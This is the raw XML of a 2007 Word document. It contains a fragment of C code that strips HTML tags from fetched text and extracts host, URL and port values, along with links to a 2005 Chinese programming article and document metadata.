        <w:t>      for(gogo=0;gogo&lt;strlen(t_ptr);gogo++)</w:t>
        <w:br/>
        <w:br/>
        <w:t>      {</w:t>
        <w:br/>
        <w:br/>
        <w:t>       if(chk)</w:t>
        <w:br/>
        <w:br/>
        <w:t>       {</w:t>
        <w:br/>
        <w:br/>
        <w:t>        if(t_ptr[gogo]=='&gt;')</w:t>
        <w:br/>
        <w:br/>
        <w:t>         chk=0;</w:t>
        <w:br/>
        <w:br/>
        <w:t>       }</w:t>
        <w:br/>
        <w:br/>
        <w:t>       else {</w:t>
        <w:br/>
        <w:br/>
        <w:t>        if(t_ptr[gogo]==' ')</w:t>
        <w:br/>
        <w:br/>
        <w:t>         continue;</w:t>
        <w:br/>
        <w:br/>
        <w:t>        else if(t_ptr[gogo]=='&lt;')</w:t>
        <w:br/>
        <w:br/>
        <w:t>         chk=1;</w:t>
        <w:br/>
        <w:br/>
        <w:t>        else test_bf[whgl++]=t_ptr[gogo];</w:t>
        <w:br/>
        <w:br/>
        <w:t>       }</w:t>
        <w:br/>
        <w:br/>
        <w:t>      }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>      if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))</w:t>
        <w:br/>
        <w:br/>
        <w:t>       continue;</w:t>
        <w:br/>
        <w:br/>
        <w:t>      else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>      if(t_ptr!=NULL)</w:t>
        <w:br/>
        <w:br/>
        <w:t>       t_ptr[0]='\0';</w:t>
        <w:br/>
        <w:br/>
        <w:t>      else continue;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>      if(filter_f(test_bf,tnum))</w:t>
        <w:br/>
        <w:br/>
        <w:t>      {</w:t>
        <w:br/>
        <w:br/>
        <w:t>       t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);</w:t>
        <w:br/>
        <w:br/>
        <w:t>       if(strstr(t_ptr,search_va[tnum].http_head))</w:t>
        <w:br/>
        <w:br/>
        <w:t>        continue;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>       memset((char *)host,0,sizeof(host));</w:t>
        <w:br/>
        <w:br/>
        <w:t>       memset((char *)url,0,sizeof(url));</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>       chk=(SCS);</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>       if(strstr(test_bf,search_va[tnum].http_head))</w:t>
        <w:br/>
        <w:br/>
        <w:t>       {</w:t>
        <w:br/>
        <w:br/>
        <w:t>        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);</w:t>
        <w:br/>
        <w:br/>
        <w:t>        port=(CONN_PORT); for(whgl=0;whgl&lt;strlen(t_ptr)+1;whgl++)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hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="宋体;SimSun" w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.gimoo.net/technology/BC/200505/163311.shtml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="宋体;SimSun"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="宋体;SimSun" w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.gimoo.net/technology/BC/200505/163311_2.shtml</w:t>
        </w:r>
      </w:hyperlink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oo.net/technology/BC/200505/163311.shtml" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gimoo.net/technology/BC/200505/163311_2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5:00Z</dcterms:created>
  <dc:creator>微软用户</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>微软用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-05-18T05:46:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title> </dc:title>
</cp:coreProperties>
</file>